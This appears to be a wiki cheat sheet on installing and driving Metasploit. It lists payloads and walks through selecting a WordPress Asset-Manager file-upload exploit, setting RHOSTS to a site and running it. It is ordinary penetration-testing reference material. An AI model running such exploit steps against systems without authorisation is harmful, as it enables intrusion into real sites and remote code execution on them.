Metasploit
Install
# UBUNTU
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstallCommands
# "Show" can be use to view all available modules
msf6 > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions
# Example
msf6 > show payloads
588 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
589 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
590 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
591 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
# "use" will set the chosen module to be executed
msf6 > use $MODULE_PATH or $SEARCH_ID
# Ex:
588 exploit/unix/webapp/wp_asset_manager_upload_exec
msf6 > use exploit/unix/webapp/wp_asset_manager_upload_exec
OR
msf6 > use 558
msf6 exploit(unix/webapp/wp_asset_manager_upload_exec) > # "show info" with selected module will show all the options
# and description about it
msf6 exploit(unix/webapp/wp_asset_manager_upload_exec) > show info
Name: WordPress Asset-Manager PHP File Upload Vulnerability
Module: exploit/unix/webapp/wp_asset_manager_upload_exec
Platform: PHP
Arch: php
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-05-26
Provided by:
Sammy FORGIT
James Fitts <fitts.james@gmail.com>
Available targets:
Id Name
-- ----
0 asset-manager <= 2.0
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits a vulnerability found in Asset-Manager <= 2.0
WordPress plugin. By abusing the upload.php file, a malicious user
can upload a file to a temp directory without authentication, which
results in arbitrary code execution.
References:
OSVDB (82653)
http://www.securityfocus.com/bid/53809
https://www.exploit-db.com/exploits/18993
http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html
https://wpscan.com/vulnerability/6106# "set $OPTION $VALUE" will set the value of an option for the module
msf6 exploit(my/exploit/path) > set RHOSTS mysite.com
RHOSTS => mysite.com# "run" will execute the exploit
msf6 exploit(my/exploit/path) > run# Search for exploits
msf6 > search type:exploit fullname:"Windows X.Y.Z"
# type:exploit -> show only exploits
# fullname:"Windows X.Y.Z" -> filter for specific info
Last updated
Was this helpful?